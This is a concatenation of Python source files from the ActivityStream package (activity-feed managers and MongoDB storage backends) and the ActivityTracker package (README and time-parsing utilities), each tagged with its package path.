defaults.update(conf)
director = ActivityDirector(**defaults)
if director._get_impl('director') != ActivityDirector:
director = director._get_impl('director')(**defaults)
_director = director
def director():
global _director
return _director | ActivityStream | /ActivityStream-0.4.0-py3-none-any.whl/activitystream/__init__.py | __init__.py |
import datetime
import logging
import time
from contextlib import contextmanager
from operator import attrgetter
from . import base
from .storage.base import (
StoredActivity,
ActivityObject,
)
log = logging.getLogger(__name__)
class NodeManager(base.NodeManagerBase):
"""Manages the network of connected nodes.
Knows how to connect and disconnect nodes and serialize the graph.
"""
def __init__(self, storage):
self.storage = storage
def follow(self, follower, following):
"""Create a directed edge from :class:`Node` ``follower`` to
:class:`Node` ``following``.
"""
self.storage.create_edge(follower, following)
def unfollow(self, follower, following):
"""Destroy a directed edge from :class:`Node` ``follower`` to
:class:`Node` ``following``.
"""
self.storage.destroy_edge(follower, following)
def is_following(self, follower, following):
"""Determine if there is a directed edge from :class:`Node`
``follower`` to :class:`Node` ``following``.
"""
return self.storage.edge_exists(follower, following)
def get_node(self, node_id):
"""Return the node for the given node_id."""
return self.storage.get_node(node_id)
def get_nodes(self, node_ids):
"""Return nodes for the given node_ids."""
return self.storage.get_nodes(node_ids)
def create_node(self, node_id):
"""Create a new node"""
return self.storage.create_node(node_id)
def save_node(self, node):
"""Save an existing node"""
return self.storage.save_node(node)
@contextmanager
def set_aggregating(self, node_id):
node = self.storage.set_aggregating(node_id)
start = datetime.datetime.utcnow()
try:
yield node
finally:
if node:
node.last_timeline_aggregation = start
node.is_aggregating = False
self.save_node(node)
class ActivityManager(base.ActivityManagerBase):
"""Serializes :class:`Activity` objects."""
def __init__(self, storage, node_manager):
self.storage = storage
self.node_manager = node_manager
def create(self, actor, verb, obj, target=None, related_nodes=None, tags=None):
"""Create and serialize an :class:`Activity`.
Serializing includes making a copy of the activity for any node in the
network that is connected to any node in the activity.
"""
# Figure out who needs a copy
related_nodes = related_nodes or []
owners = [
node.node_id for node in [actor, obj, target] + related_nodes
if getattr(node, 'node_id', None)]
activity = None
for owner in owners:
activity = StoredActivity(
actor=actor,
verb=verb,
obj=obj,
target=target,
published=datetime.datetime.utcnow(),
node_id=owner,
tags=tags,
)
self.storage.save_activity(activity)
return activity
def get_activities(self, nodes, since=None, sort=None, limit=0, skip=0, query=None):
"""Return all activities associated with the given nodes.
Params:
since (datetime) - return activities that have occured since this
datetime
"""
return self.storage.get_activities(nodes, since=since, sort=sort,
limit=limit, skip=skip, query=query)
def save_timeline(self, node_id, activities):
"""Save a list of activities to a node's timeline."""
self.storage.save_timeline(node_id, activities)
def get_timeline(self, node_id, sort=None, limit=0, skip=0, query=None):
"""Return the timeline for node_id.
Timeline is the already-aggregated list of activities.
"""
return self.storage.get_timeline(node_id, sort=sort, limit=limit,
skip=skip, query=query)
class Aggregator:
"""Creates a timeline for a given node in the network graph."""
def __init__(self, activity_manager, node_manager):
self.node_manager = node_manager
self.activity_manager = activity_manager
def _unique_activities(self, activities):
"""Return a list of unique activities.
"""
attrs = ('actor', 'obj', 'target')
seen, unique = [], []
for activity in activities:
d = {a: ActivityObject.to_dict(getattr(activity, a))
for a in attrs}
d.update(verb=activity.verb)
if d in seen:
continue
seen.append(d)
unique.append(activity)
return unique
def classify_activities(self, activities):
"""Return a list of activities with classfication flags added."""
return activities
def create_timeline(self, node_id):
"""Create, store, and return the timeline for a given node.
If an aggregation is already running for the given node, the most
recently aggregated timeline will be returned, and a new aggregation
will not be started.
"""
with self.node_manager.set_aggregating(node_id) as node:
if node:
last_timeline_aggregation = node.last_timeline_aggregation
# get a subset of the nodes being followed
connections = []
if node.following:
connections = self.filter_connections(
self.node_manager.get_nodes(node.following))
activities = []
if connections:
# retrieve the followed nodes' activities
activities = self.activity_manager.get_activities(connections,
since=last_timeline_aggregation)
# filter activities for followed nodes
activities = self.filter_activities(activities)
# add activities for this node
activities += self.activity_manager.get_activities([node],
since=last_timeline_aggregation)
# if we don't have any new activities at this point, there's nothing from
# which to generate a timeline
if not activities:
return
# remove duplicates
activities = self._unique_activities(activities)
# classify and score activities
activities = self.classify_activities(activities)
activities = self.score_activities(activities)
# save to this node's timeline
self.activity_manager.save_timeline(node_id, activities)
def needs_aggregation(self, node):
"""Return True if this node's timeline needs to be (re)aggregated).
"""
last = node.last_timeline_aggregation
nodes = [node]
if node.following:
nodes.extend(self.node_manager.get_nodes(node.following))
activities = self.activity_manager.get_activities(nodes, since=last,
limit=1)
return bool(activities)
def get_timeline(self, node, page=0, limit=100, actor_only=False, filter_func=None):
"""Return a (paged and limited) timeline for `node`.
`page` is zero-based (page 0 is the first page of results).
If `actor_only` == True, timeline will be filtered to only include
activities where `node` is the actor.
Pass a callable to `filter_func` to arbitrarily filter activities out of the
timeline. `filter_func` will be passed an activity, and should return True
to keep the activity in the timeline, or False to filter it out.
Total size of the returned timeline may be less than `limit` if:
1. the timeline is exhausted (last page)
2. activities are filtered out by filter_func
"""
node_id = node.node_id
node = self.node_manager.get_node(node_id)
page, limit = int(page), int(limit or 0)
if not node or self.needs_aggregation(node):
self.create_timeline(node_id)
query_filter = {'actor.node_id': node_id} if actor_only else None
timeline = self.activity_manager.get_timeline(
node_id, sort=[('score', -1)], skip=page*limit, limit=limit,
query=query_filter)
if filter_func:
timeline = list(filter(filter_func, timeline))
return timeline
def filter_connections(self, nodes):
"""Return a subset of a node's total outbound connections (nodes he is
following) using the algorithm of your choice.
"""
return nodes
def filter_activities(self, activities):
"""Return a subset of a node's activities using the algorithm of your
choice.
"""
return activities
def score_activities(self, activities):
"""Return a scored list of activities. By default, newer activities
have higher scores.
"""
for a in activities:
a.score = time.mktime(a.published.timetuple())
return activities | ActivityStream | /ActivityStream-0.4.0-py3-none-any.whl/activitystream/managers.py | managers.py |
from ..base import (
NodeBase,
ActivityBase,
ActivityObjectBase,
)
class StoredNode(NodeBase):
"""Extends `NodeBase` with additional attributes that must be persisted by
`Storage` implementations.
:ivar followers: List of node ids that are following this node.
:ivar following: List of node ids that this node is following.
:ivar last_timeline_aggregation: Datetime of the last timeline
aggregation for this node.
"""
def __init__(self, **kw):
super().__init__()
self.followers = []
self.following = []
self.last_timeline_aggregation = None
for k, v in kw.items():
setattr(self, k, v)
class StoredActivity(ActivityBase):
"""Extends `ActivityBase` with additional attributes that must be persisted
by `Storage` implementations.
:ivar score:
Ranking of this activity relative to other activities in the same
timeline. May be None if the activity has not been aggregated into
a timeline.
:class:`float`
:ivar owner_id:
Node id of the owner of the timeline to which this activity belongs.
May be None if the activity has not yet been aggregated into a
timeline.
:ivar node_id:
Node id to which this activity belongs.
"""
def __init__(self, **kw):
super().__init__()
for k, v in kw.items():
if k in ('actor', 'obj', 'target') and isinstance(v, dict):
v = ActivityObject(**v)
setattr(self, k, v)
def to_dict(self, **kw):
d = dict(
actor=ActivityObject.to_dict(self.actor,
node_id=self.actor.node_id),
verb=self.verb,
obj=ActivityObject.to_dict(self.obj),
target=ActivityObject.to_dict(self.target),
published=self.published,
node_id=getattr(self, 'node_id', None),
owner_id=getattr(self, 'owner_id', None),
score=getattr(self, 'score', None),
tags=getattr(self, 'tags', None),
)
d.update(kw)
return d
def __eq__(self, other):
return self.to_dict() == other.to_dict()
class ActivityObject(ActivityObjectBase):
def __init__(self, **kw):
super().__init__()
for k, v in kw.items():
setattr(self, k, v)
@staticmethod
def to_dict(obj, **kw):
if not obj or not any((obj.activity_name, obj.activity_url,
obj.activity_extras)):
return {}
d = dict(activity_name=obj.activity_name,
activity_url=obj.activity_url,
activity_extras=obj.activity_extras,
)
d.update(kw)
return d
class Storage:
def __init__(self, conf):
"""Initialize storage backend.
:param conf: dictionary of config values
"""
self.conf = conf
def create_edge(self, from_node, to_node):
"""Create a directed edge from :class:`Node` ``follower`` to
:class:`Node` ``following``.
"""
raise NotImplementedError
def destroy_edge(self, from_node, to_node):
"""Destroy a directed edge from :class:`Node` ``follower`` to
:class:`Node` ``following``.
"""
raise NotImplementedError
def edge_exists(self, from_node, to_node):
"""Determine if there is a directed edge from :class:`Node`
``follower`` to :class:`Node` ``following``.
"""
raise NotImplementedError
def get_node(self, node_id):
"""Return the node for the given node_id.
"""
raise NotImplementedError
def get_nodes(self, node_ids):
"""Return nodes for the given node_ids.
"""
raise NotImplementedError
def create_node(self, node_id):
"""Create a new node.
"""
raise NotImplementedError
def save_node(self, node):
"""Save a node.
"""
raise NotImplementedError
def set_aggregating(self, node_id):
"""Set an ``is_aggregating`` flag for ``node_id`` if it's not already
aggregating.
If the node is already aggregating, return None. Otherwise, set the
flag and return the node (creating the node if it doesn't already
exist).
"""
raise NotImplementedError
def save_activity(self, activity):
"""Save an activity.
"""
raise NotImplementedError
def get_activities(self, nodes, since=None, sort=None, limit=None, skip=0, query=None):
"""Return all activities associated with the given nodes.
Params:
since (datetime) - return activities that have occured since this
datetime
"""
raise NotImplementedError
def save_timeline(self, owner_id, activities):
"""Save timeline.
"""
raise NotImplementedError
def get_timeline(self, node_id, sort=None, limit=None, skip=0, query=None):
"""Return the timeline for node_id.
Timeline is the already-aggregated list of activities in mongo.
"""
raise NotImplementedError | ActivityStream | /ActivityStream-0.4.0-py3-none-any.whl/activitystream/storage/base.py | base.py |
from datetime import datetime
from ming import Session
from ming import schema as S
from ming.datastore import create_datastore
from ming.odm import (
Mapper,
FieldProperty,
)
from ming.odm.odmsession import ThreadLocalODMSession
from ming.odm.declarative import MappedClass
from .base import (
StoredNode,
StoredActivity,
ActivityObject,
Storage,
)
activity_doc_session = Session.by_name("activitystream")
activity_odm_session = session = ThreadLocalODMSession(activity_doc_session)
class Node(MappedClass, StoredNode):
class __mongometa__:
session = activity_odm_session
name = 'nodes'
indexes = ['node_id']
_id = FieldProperty(S.ObjectId)
node_id = FieldProperty(str)
followers = FieldProperty([str])
following = FieldProperty([str])
last_timeline_aggregation = FieldProperty(S.DateTime)
is_aggregating = FieldProperty(S.Bool)
class ActivityObjectType(S.Object):
def __init__(self, actor=False, **kw):
fields = dict(
activity_name=S.String(),
activity_url=S.String(),
activity_extras=S.Object({None: None}, if_missing={}),
)
if actor:
fields['node_id'] = S.String()
super().__init__(fields=fields, **kw)
class Activity(MappedClass, StoredActivity):
class __mongometa__:
session = activity_odm_session
name = 'activities'
indexes = [
('node_id', 'published'),
('owner_id', 'score'),
]
_id = FieldProperty(S.ObjectId)
owner_id = FieldProperty(S.String, if_missing=None)
node_id = FieldProperty(str)
actor = FieldProperty(ActivityObjectType(actor=True))
verb = FieldProperty(str)
obj = FieldProperty(ActivityObjectType)
target = FieldProperty(ActivityObjectType, if_missing=None)
published = FieldProperty(datetime)
score = FieldProperty(S.Float, if_missing=None)
tags = FieldProperty([str])
Mapper.compile_all()
class MingStorage(Storage):
"""Ming storage engine."""
def __init__(self, conf):
"""Initialize storage backend.
:param conf: dictionary of config values
"""
self.conf = conf
ming_opts = {k[len('activitystream.ming.'):]: v
for k, v in conf.items()
if k.startswith('activitystream.ming.')}
datastore = create_datastore(conf['activitystream.master'].rstrip('/') + '/' + conf['activitystream.database'],
**ming_opts)
Session._datastores['activitystream'] = datastore
Session.by_name('activitystream').bind = datastore
def create_edge(self, from_node, to_node):
"""Create a directed edge from :class:`Node` ``follower`` to
:class:`Node` ``following``.
"""
Node.query.update({"node_id": from_node.node_id},
{"$addToSet": {"following": to_node.node_id}}, upsert=True)
Node.query.update({"node_id": to_node.node_id},
{"$addToSet": {"followers": from_node.node_id}}, upsert=True)
def destroy_edge(self, from_node, to_node):
"""Destroy a directed edge from :class:`Node` ``follower`` to
:class:`Node` ``following``.
"""
Node.query.update({"node_id": from_node.node_id},
{"$pull": {"following": to_node.node_id}})
Node.query.update({"node_id": to_node.node_id},
{"$pull": {"followers": from_node.node_id}})
def edge_exists(self, from_node, to_node):
"""Determine if there is a directed edge from :class:`Node`
``follower`` to :class:`Node` ``following``.
"""
return Node.query.find({"node_id": from_node.node_id,
"following": to_node.node_id}).first() is not None
def get_node(self, node_id):
"""Return the node for the given node_id.
"""
return Node.query.get(node_id=node_id)
def get_nodes(self, node_ids):
"""Return nodes for the given node_ids.
"""
return Node.query.find({"node_id": {"$in": node_ids}}).all()
def create_node(self, node_id, **kw):
"""Create a new node.
"""
node = Node(node_id=node_id, **kw)
session.flush()
return node
def save_node(self, node):
"""Save a node.
"""
session.flush()
return node
def set_aggregating(self, node_id):
"""Set an ``is_aggregating`` flag for ``node_id`` if it's not already
aggregating.
If the node is already aggregating, return None. Otherwise, set the
flag and return the node (creating the node if it doesn't already
exist).
"""
if not self.get_node(node_id):
self.create_node(node_id, is_aggregating=False)
return Node.query.find_and_modify(
query={'node_id': node_id, 'is_aggregating': {'$ne': True}},
update={'$set': {'is_aggregating': True}},
new=True,
)
def save_activity(self, activity):
"""Save an activity.
"""
activity = Activity(**activity.to_dict())
session.flush()
return activity
def get_activities(self, nodes, since=None, sort=None, limit=None, skip=0, query=None):
"""Return all activities associated with the given nodes.
Params:
since (datetime) - return activities that have occured since this
datetime
"""
node_ids = [node.node_id for node in nodes]
q = {'node_id': {'$in': node_ids}}
if since:
q['published'] = {'$gte': since}
if query:
q.update(query)
q['owner_id'] = None
return Activity.query.find(q, sort=sort, limit=limit, skip=skip).all()
def save_timeline(self, owner_id, activities):
"""Save a list of activities to a node's timeline.
"""
for a in activities:
# Don't save changes to the original activity, just use it
# to create a new activity in the timeline.
session.expunge(a)
Activity(**a.to_dict(owner_id=owner_id))
session.flush()
def get_timeline(self, node_id, sort=None, limit=None, skip=0, query=None):
"""Return the timeline for node_id.
Timeline is the already-aggregated list of activities in mongo.
"""
q = {'owner_id': node_id}
if query:
q.update(query)
return Activity.query.find(q, sort=sort, limit=limit, skip=skip).all() | ActivityStream | /ActivityStream-0.4.0-py3-none-any.whl/activitystream/storage/mingstorage.py | mingstorage.py |
import pymongo
from .base import (
StoredNode,
StoredActivity,
Storage,
)
class PymongoStorage(Storage):
"""Pymongo storage engine."""
def __init__(self, conf):
"""Initialize storage backend.
:param conf: dictionary of config values
"""
self.conf = conf
self.connection = self._get_connection(conf)
self.db = self.connection[conf['activitystream.database']]
self.activity_collection = \
self.db[conf['activitystream.activity_collection']]
self.node_collection = \
self.db[conf['activitystream.node_collection']]
def _get_connection(self, conf):
if conf['activitystream.master'].startswith('mim://'):
try:
from ming import mim
except ImportError as e:
raise ImportError(str(e) + '. To use mim:// you must have the '
'ming package installed.')
else:
return mim.Connection()
else:
return pymongo.MongoClient(conf['activitystream.master'])
def create_edge(self, from_node, to_node):
"""Create a directed edge from :class:`Node` ``follower`` to
:class:`Node` ``following``.
"""
self.node_collection.update({"node_id": from_node.node_id},
{"$addToSet": {"following": to_node.node_id}}, upsert=True)
self.node_collection.update({"node_id": to_node.node_id},
{"$addToSet": {"followers": from_node.node_id}}, upsert=True)
def destroy_edge(self, from_node, to_node):
"""Destroy a directed edge from :class:`Node` ``follower`` to
:class:`Node` ``following``.
"""
self.node_collection.update({"node_id": from_node.node_id},
{"$pull": {"following": to_node.node_id}})
self.node_collection.update({"node_id": to_node.node_id},
{"$pull": {"followers": from_node.node_id}})
def edge_exists(self, from_node, to_node):
"""Determine if there is a directed edge from :class:`Node`
``follower`` to :class:`Node` ``following``.
"""
result = self.node_collection.find_one({"node_id": from_node.node_id,
"following": to_node.node_id})
return result is not None
def get_node(self, node_id):
"""Return the node for the given node_id.
"""
d = self.node_collection.find_one({"node_id": node_id})
return StoredNode(**d) if d else None
def get_nodes(self, node_ids):
"""Return nodes for the given node_ids.
"""
return [StoredNode(**doc) for doc in
self.node_collection.find({"node_id": {"$in": node_ids}})]
def create_node(self, node_id, **kw):
"""Create a new node.
"""
return self.save_node(StoredNode(node_id=node_id, **kw))
def save_node(self, node):
"""Save a node.
"""
self.node_collection.save(vars(node))
return node
def set_aggregating(self, node_id):
"""Set an ``is_aggregating`` flag for ``node_id`` if it's not already
aggregating.
If the node is already aggregating, return None. Otherwise, set the
flag and return the node (creating the node if it doesn't already
exist).
"""
if not self.get_node(node_id):
self.create_node(node_id, is_aggregating=False)
d = self.node_collection.find_and_modify(
query={'node_id': node_id, 'is_aggregating': {'$ne': True}},
update={'$set': {'is_aggregating': True}},
new=True,
)
return StoredNode(**d) if d else None
def save_activity(self, activity):
"""Save an activity.
"""
self.activity_collection.insert(activity.to_dict())
return activity
def get_activities(self, nodes, since=None, sort=None, limit=None, skip=0, query=None):
"""Return all activities associated with the given nodes.
Params:
since (datetime) - return activities that have occured since this
datetime
"""
node_ids = [node.node_id for node in nodes]
q = {'node_id': {'$in': node_ids}}
if since:
q['published'] = {'$gte': since}
if query:
q.update(query)
q['owner_id'] = None
it = self.activity_collection.find(q, sort=sort, limit=limit, skip=skip)
return [StoredActivity(**doc) for doc in it]
def save_timeline(self, owner_id, activities):
"""Save a list of activities to a node's timeline.
"""
for a in activities:
self.activity_collection.insert(a.to_dict(owner_id=owner_id))
def get_timeline(self, node_id, sort=None, limit=None, skip=0, query=None):
"""Return the timeline for node_id.
Timeline is the already-aggregated list of activities in mongo.
"""
q = {'owner_id': node_id}
if query:
q.update(query)
timeline = self.activity_collection.find(q, sort=sort, limit=limit, skip=skip)
return [StoredActivity(**doc) for doc in timeline] | ActivityStream | /ActivityStream-0.4.0-py3-none-any.whl/activitystream/storage/pymongostorage.py | pymongostorage.py |
===============
ActivityTracker
===============
A tool for querying various sources to see what time was worked on specific
tasks. Contains various plugins for Tomboy notes and text files.
Usage
=====
The basic workflow with ActivityTracker is to define a "group" of
files that contain time-based task intervals in some format. At
the moment, ActivityTracker comes with three different parsers:
1. Emacs OrgMode_ files
2. Tomboy notes
3. Plain text files
Setting Up
----------
1. Create a new directory, ``/home/myhomedir/.activitytracker``
2. Setup a new file, ``/home/myhomedir/.activitytracker/config.ini``
3. Add group entries to ``config.ini``
OrgMode_
--------
An entry for a group of OrgMode_ files looks like this::
[File Group: Emacs OrgMode Files]
base_dir = /somedir/org-files
filename_match = [-_a-zA-Z0-9]*[.]org$
parser_name = activitytracker.plugins.orgmode.EmacsOrgModeParser
Please see the OrgMode_ home page for specifics on the OrgMode_
format. ActivityTracker's OrgMode parser has two requirements:
1. Headings meant to be recorded/queried should have the **book** tag
2. The second line after a heading with **book** tag should have a
timestamp indicating the length of time worked
Here is an example entry:
** ActivityTracker :book:
<2011-04-16 Sat 10:00-14:00>
Working on orgmode support
Tomboy
------
An entry for a group of Tomboy_ notes on a recent Gnome configuration
would look like this:
[File Group: Tomboy Notes]
base_dir = /home/myhomedir/.local/share/tomboy
filename_match = [a-zA-Z-0-9]*?[.]note
parser_name = activitytracker.plugins.tomboy.TomboyFileParser
Plain Text Files
----------------
An entry for a group of plain text files would look like this:
[File Group: Legacy Journal Files]
base_dir = /home/myhomedir/Documents/journal
filename_match = month-[a-zA-Z]+-[0-9]+[.]txt$
parser_name = activitytracker.plugins.text.TextFileParser
.. _OrgMode: http://orgmode.org/
.. _Tomboy: http://projects.gnome.org/tomboy/?pagewanted=all
Writing Plugins
===============
The ActivityTracker plugin mechanism expects a *callable* to
be named as the ``parser_name`` value in a file entry group.
While checking files, the *callable* will be invoked (with no
arguments). The *callable* must return an object with a
``parse_input`` function. The ``parse_input`` function
will be invoked for every file matching the criteria.
After ``parse_input`` is invoked at least once, the object must
ensure it has a ``projects`` attribute as an iterable of
*Project* instances.
URLs
====
* http://pypi.python.org/pypi/ActivityTracker
* http://src.serverzen.com/activitytracker
Credits
=======
* Created and maintained by Rocky Burt <rocky AT serverzen DOT com>.
| ActivityTracker | /ActivityTracker-1.0.tar.gz/ActivityTracker-1.0/README.rst | README.rst |
import datetime
import re
import os
import StringIO
import xml.dom
TIME_RE = re.compile(r'([0-9]?[0-9]):([0-9][0-9])(am|pm|)')
DIGITS = '0123456789'
MONTH_NAMES = [None, u'january', u'february', u'march', u'april', u'may',
u'june', u'july', u'august', u'september', u'october',
u'november', u'december']
MONTHS = {}
for x, month in enumerate(MONTH_NAMES):
if month is not None:
MONTHS[month] = x
MONTHS[month[:3]] = x
MONTHS[x] = month
def parse_time(s):
"""Take the given string and pull out a time object representation.
>>> parse_time('2:00pm')
datetime.time(14, 0)
>>> parse_time('1:00')
datetime.time(1, 0)
>>> parse_time('3')
datetime.time(3, 0)
>>> parse_time('6p')
datetime.time(18, 0)
>>> parse_time('abc def 7:32a')
datetime.time(7, 32)
>>> parse_time(u'1:30pm foo bar')
datetime.time(13, 30)
>>> parse_time('12:15p')
datetime.time(12, 15)
>>> parse_time('foobar')
Traceback (most recent call last):
...
ValueError: Couldn't find a valid time in 'foobar'
"""
first = -1
last = -1
for x, c in enumerate(s):
if first == -1 and c in DIGITS:
first = x
elif first != -1 and c == ' ':
last = x
break
if first == -1:
raise ValueError("Couldn't find a valid time in %r" % str(s))
if last == -1:
last = len(s)
timestr = str(s[first:last])
colonpos = timestr.find(':')
apos = timestr.find('a')
ppos = timestr.find('p')
ampmpos = -1
if apos > -1:
ampmpos = apos
elif ppos > -1:
ampmpos = ppos
if colonpos > -1:
endhourpos = colonpos
elif ampmpos > -1:
endhourpos = ampmpos
else:
endhourpos = len(timestr)
hour = int(timestr[:endhourpos])
minute = 0
if colonpos > -1:
if ampmpos > -1:
minute = int(timestr[colonpos + 1:ampmpos])
else:
minute = int(timestr[colonpos + 1:])
if ppos > -1 and hour < 12:
hour += 12
elif ppos == -1 and hour == 12:
hour = 0
tm = datetime.time(hour, minute)
return tm
class AbstractFileParser(object):
def __init__(self, projects, default_project):
self.projects = projects
self.default_project = default_project
def parse_input(self, input):
raise NotImplementedError()
class StandardFileParser(AbstractFileParser):
"""Activitytracker2 has introduced a new format for defining dates, times,
etc. This new format protocol is referred to as the 'standard' format.
Any time a pre-activitytracker2 format is referred to it will be called
the 'legacy' format.
"""
GENERAL_COMMAND_RE = re.compile(r'\[([.a-zA-Z0-9:/\-_ #]*?)\]')
TIME_RE = TIME_RE
FULL_DATE_RE = re.compile(r'Today: [a-zA-Z]*?, *([0-9][0-9]?) '
r'*([a-zA-Z]*) *([0-9]*)')
default_project = None
def _dt(self, tm, date=None):
if date == None:
date = self.current_date
return datetime.datetime.combine(date, tm)
def handle_interval(self, tm):
note_list = [x.strip() for x in self.current_note]
note = '\n'.join(note_list)
note = note.strip()
interval = Interval(self._dt(self.last_time),
self._dt(tm),
note)
self.projects[self.current_project_name].intervals.append(interval)
self.current_note = []
def handle_command(self, cmd, at_beginning=False):
# check for a time cmd at beginning of the cmd string
result = self.TIME_RE.search(cmd)
if result and result.start() == 0:
spanstart, spanstop = result.span()
tm = parse_time(cmd)
if not at_beginning and self.last_time is not None:
self.handle_interval(tm)
self.last_time = None
elif self.last_time is not None:
self.handle_interval(tm)
self.last_time = tm
else:
self.last_time = tm
if spanstop - spanstart < len(cmd):
rest = cmd[spanstop:].strip()
parts = [x.strip() for x in rest.split('/')]
self.current_project_name = '/'.join(parts)
elif self.default_project is not None \
and self.current_project_name is None:
self.current_project_name = self.default_project
def setup_date(self, date):
self.current_date = date
def get_data(self, input):
raise NotImplementedError()
def parse_input(self, input):
"""The input argument is required to be a file-like object.
"""
data = self.get_data(input)
if data is None:
return
self.last_time = None
self.current_date = None
self.current_note = []
self.current_project_name = None
io = StringIO.StringIO(data)
for line in io.readlines():
line = line.rstrip()
result = self.GENERAL_COMMAND_RE.search(line)
if result and len(result.groups()) > 0:
at_beginning = result.start() == 0
self.handle_command(result.groups()[0],
at_beginning)
if not at_beginning:
self.current_note.append(line)
if not result:
result = self.FULL_DATE_RE.search(line)
if result:
sday, smonth, syear = result.groups()
day = int(sday)
month = MONTHS[smonth.lower()]
year = int(syear)
date = datetime.date(year, month, day)
self.setup_date(date)
if not result:
self.current_note.append(line)
now = datetime.datetime.now()
if self.current_date == now.date() \
and self.current_project_name is not None \
and self.last_time is not None:
tm = now.time()
mins = int((tm.minute + 7.5) // 15 * 15)
if mins >= 60:
mins = 45
tm = tm.replace(minute=mins, second=0, microsecond=0)
self.handle_interval(tm)
class Interval(object):
"""Some period of time with start and end datetime's and an optional
node.
>>> from datetime import datetime
>>> Interval(datetime(2003, 2, 9), datetime(2003, 2, 12))
<Interval start=2003-02-09 00:00:00; stop=2003-02-12 00:00:00>
>>> Interval(datetime(2003, 2, 9), datetime(2003, 2, 12)).total
datetime.timedelta(3)
"""
start = None
stop = None
note = None
def __init__(self, start, stop, note=None):
self.start = start
self.stop = stop
self.note = note or u''
if stop < start:
raise ValueError('The start date cannot come after the stop date '
'(start=%s; stop=%s)' % (str(start), str(stop)))
@property
def total(self):
return self.stop - self.start
def __str__(self):
return '<Interval start=%s; stop=%s>' % (str(self.start),
str(self.stop))
__repr__ = __str__
def flatten_to_text(*nodes):
"""Extract as much text from the node and children nodes (recursively)
as possible.
>>> from xml.dom import minidom
>>> dom = minidom.parseString('<root>foobar</root>')
>>> flatten_to_text(dom)
u'foobar'
>>> dom = minidom.parseString('<abc>bar<def>hello world</def>foo</abc>')
>>> flatten_to_text(dom)
u'barhello worldfoo'
>>> flatten_to_text(dom.childNodes)
u'barhello worldfoo'
>>> dom1 = minidom.parseString('<abc>foo</abc>')
>>> dom2 = minidom.parseString('<abc>bar</abc>')
>>> flatten_to_text(dom1, dom2)
u'foobar'
"""
s = u''
for node in nodes:
if isinstance(node, xml.dom.minidom.Text):
s += node.wholeText
else:
if isinstance(node, (list, tuple, xml.dom.minicompat.NodeList)):
subnodes = node
else:
subnodes = node.childNodes
for x in subnodes:
s += flatten_to_text(x)
return s
def find_config_file(fname):
currentdir = os.getcwd()
fullpath = os.path.join(currentdir, '.activitytracker', fname)
if os.path.isfile(fullpath):
return fullpath
homedir = os.path.expanduser('~')
fullpath = os.path.join(homedir, '.activitytracker', fname)
if os.path.isfile(fullpath):
return fullpath
return None | ActivityTracker | /ActivityTracker-1.0.tar.gz/ActivityTracker-1.0/activitytracker/base.py | base.py |
import calendar
import datetime
import logging
import re
import textwrap
import time
from activitytracker.base import MONTHS, MONTH_NAMES, find_config_file
logger = logging.getLogger('activitytracker')
ONE_DAY = datetime.timedelta(days=1)
WEEKDAY_NAMES = [u'monday', u'tuesday', u'wednesday',
u'thursday', u'friday', u'saturday', u'sunday']
WEEKDAYS = {}
for x, weekday in enumerate(WEEKDAY_NAMES):
WEEKDAYS[weekday] = x
WEEKDAYS[x] = weekday
WEEKDAYS[weekday[:3]] = x
WEEKDAYS[weekday[:2]] = x
FORMATTERS = {}
def out(s='', padding=''):
s = textwrap.fill(s, initial_indent=padding,
subsequent_indent=padding + ' ')
print s
def pretty(v):
for types, func in FORMATTERS.items():
if isinstance(v, types):
return func(v)
return str(v)
def _pretty_timedelta(v):
"""Create a formatted string for the given timedelta object.
>>> from datetime import timedelta
>>> _pretty_timedelta(timedelta(hours=3))
u'3.0 hrs'
>>> _pretty_timedelta(timedelta(minutes=45))
u'45 mins'
>>> _pretty_timedelta(timedelta(hours=2, minutes=54))
u'2.9 hrs'
"""
hours = (v.days * 24.0) + (v.seconds / 3600.0)
if hours >= 1.0:
return u'%s hrs' % hours
else:
return u'%.0f mins' % (hours * 60.0)
FORMATTERS[(datetime.timedelta,)] = _pretty_timedelta
def _pretty_datetime(v):
"""Create a formatted string for the given timedelta object.
>>> from datetime import datetime, date, time
>>> _pretty_datetime(datetime(2007, 5, 7, 3, 30))
u'Mon, May 7, 2007 3:30am'
>>> _pretty_datetime(date(2007, 03, 22))
u'Thu, Mar 22, 2007'
>>> _pretty_datetime(time(13, 21))
u'1:21pm'
"""
tm = None
date = None
if isinstance(v, (datetime.date, datetime.datetime)):
date = MONTHS[v.month][:3].title()
date += u' ' + unicode(v.day) + u', ' + unicode(v.year)
date = WEEKDAYS[calendar.weekday(v.year, v.month, v.day)] \
[:3].title() + ', ' + date
if isinstance(v, (datetime.time, datetime.datetime)):
ampm = u'am'
hour = v.hour
if hour >= 12:
ampm = u'pm'
if hour > 12:
hour = hour - 12
if hour == 0:
hour = 12
ampm = u'am'
smin = unicode(v.minute)
if len(smin) == 1:
smin = u'0' + smin
tm = unicode(hour) + u':' + smin + ampm
if date and tm:
return date + u' ' + tm
elif date:
return date
elif tm:
return tm
FORMATTERS[(datetime.datetime, datetime.date, datetime.time)] = \
_pretty_datetime
XML_ESCAPE_CODES = {'>': '>',
'<': '<'}
def last_monthday(dt):
"""Retrive the date representing the last day of the month.
>>> from datetime import datetime, date
>>> last_monthday(datetime(2003, 03, 27))
datetime.date(2003, 3, 31)
>>> last_monthday(date(2003, 11, 23))
datetime.date(2003, 11, 30)
>>> last_monthday(date(2003, 2, 2))
datetime.date(2003, 2, 28)
>>> last_monthday(date(2000, 2, 2))
datetime.date(2000, 2, 29)
"""
t = datetime.datetime(dt.year, dt.month, dt.day)
while t.month == dt.month:
t += ONE_DAY
t -= ONE_DAY
return t.date()
class ProjectContainer(object):
"""A collection of project objects. An importtant implementation note
is that this container will automatically create projects when a project
is trying to be retrieved via the [] interface. So an error being raised
or None being returned will never happen. Also note that even though
a project container thinks it has intervals, it's interval list will
be empty (an empty tuple).
>>> container = ProjectContainer()
>>> container['abc/def'].intervals
[]
>>> container['abc/ghi'].intervals
[]
>>> len(container)
1
>>> len(container['abc'])
2
"""
intervals = ()
formatted_name = None
def __init__(self):
self._data = {}
self._name_map = {}
def keys(self):
return self._data.keys()
def fullkeys(self):
keys = []
for x in self.projects:
keys += x.fullkeys()
return keys
def __getitem__(self, k):
k = unicode(k or '').lower()
prj = self
items = [x.strip() for x in k.split('/', 1)]
prj = self._localgetitem(items[0])
if len(items) > 1:
return prj[items[1]]
return prj
def _localgetitem(self, k):
prj = self._data.get(k, None)
if prj is None:
prj = Project(k)
self._data[k] = prj
return prj
def __delitem__(self, k):
k = k or ''
prj = self
items = k.split('/', 1)
if len(items) == 1:
del self._data[items[0]]
else:
prj = self._data[items[0]]
del prj['/'.join(items[1:])]
